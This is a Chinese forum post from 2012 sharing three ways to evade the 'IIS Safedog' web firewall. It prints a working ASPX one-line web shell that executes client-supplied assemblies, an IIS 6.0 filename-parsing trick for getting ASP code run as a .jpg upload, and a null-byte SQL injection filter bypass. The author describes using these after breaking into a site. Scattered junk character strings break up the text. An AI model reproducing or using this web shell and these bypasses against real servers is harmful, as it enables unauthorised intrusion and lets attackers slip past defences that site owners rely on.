1、绕过IIS安全狗的一句话。, b6 x" \* C3 T2 O8 x$ T! S
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。% s$ B& {( g* O- U
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
; u- H' q5 B# K) a5 r) ~5 `. Z4 s/ Y* }* W
2、IIS6.0解析漏洞遇到安全狗。3 Z2 G7 j. r6 M1 y7 N
文件名为2 R3 g/ ^! F& C
http://www.xxxxx.com/sh3llc0de.asp;1.jpg7 x/ e5 S' E5 }' u# j) j
$ p& A1 K$ }0 p/ z% S这样的会被IIS安全狗果断屏蔽。- a/ H% r7 i9 B! H; a/ o
改成如下名称,IIS6一样会解析:
5 g+ j h4 ^. ~0 b$ C3 A" a4 Xwww.xxxxx.com/;1.asp;1.jpg
: V& W; b7 F. p7 w+ ]6 S. f* V. q" z/ _! T3 o) ^
3、安全狗的注入绕过。
1 G1 w* a, ~6 |' Z常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
. c$ Y5 V% g, H0 x) H但如果:4 g. h: d4 S5 D, u7 `' M! y
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1% e+ A) i8 c+ r
就可以成功绕过了。
' f7 o0 t$ L- r. f
1 K0 s. d. b0 [+ @# y4 I% t# a3 y, u/ u D3 {2 _
|
发表于 2012-10-31 08:25:30
收藏
支持
反对